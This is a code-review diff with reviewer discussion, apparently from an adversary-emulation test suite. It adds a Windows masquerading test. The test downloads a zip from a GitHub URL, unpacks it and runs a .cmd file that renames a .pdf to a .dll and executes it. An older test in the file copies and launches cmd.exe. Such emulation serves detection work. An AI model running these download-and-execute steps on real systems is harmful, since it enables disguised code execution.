atomics/T1036/T1036.yaml

```diff
@@ -11,4 +11,30 @@ atomic_tests:
       copy %WINDIR%\System32\cmd.exe /Y %ALLUSERSPROFILE%\cmd.exe
       start %ALLUSERSPROFILE%\cmd.exe
     cleanup_command: del %ALLUSERSPROFILE%\cmd.exe >nul 2>&1
-    name: command_prompt
\ No newline at end of file
+    name: command_prompt
+- name: Malware Masquerading and Execution from Zip File
+  description: Upon the unzipping of the file, the .cmd file executes and changes the .pdf to .dll and executes the dll
+  supported_platforms:
+  - windows
+  input_arguments:
+    url:
+      description: Location of zip file
+      type: Url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1036/bin/T1036.zip
+    file:
+      description: cmd file that performs execution
+      type: Path
+      default: C:\Users\$env:username\Downloads\T1036\README.cmd
+  prereq_command: |
+    Invoke-WebRequest -outputFile "C:\Users\$env:username\Downloads\T1036.zip" #{url}
+    Expand-Archive -Path C:\Users\$env:username\Downloads\T1036.zip -DestinationPath C:\Users\$env:username\Downloads
+  get_prereq_command: |
+    if (Test-Path C:\Users\$env:username\Downloads\T1036.zip) {exit 0} else {exit 1}
+  executor:
+    command: |-
+      cd $(split-path -path #{file})
+      cmd /c #{file}

```

Comment:
A simplifying suggestion is to call "cmd /c" on the full path of the file instead cd'ing to the directory first:

cmd /c <full path to file>

Reply:
This was the only change that we could not make. In order for us to do that, we would have to change the README file to contain the working directory path which is not what is supposed to happen in this atomic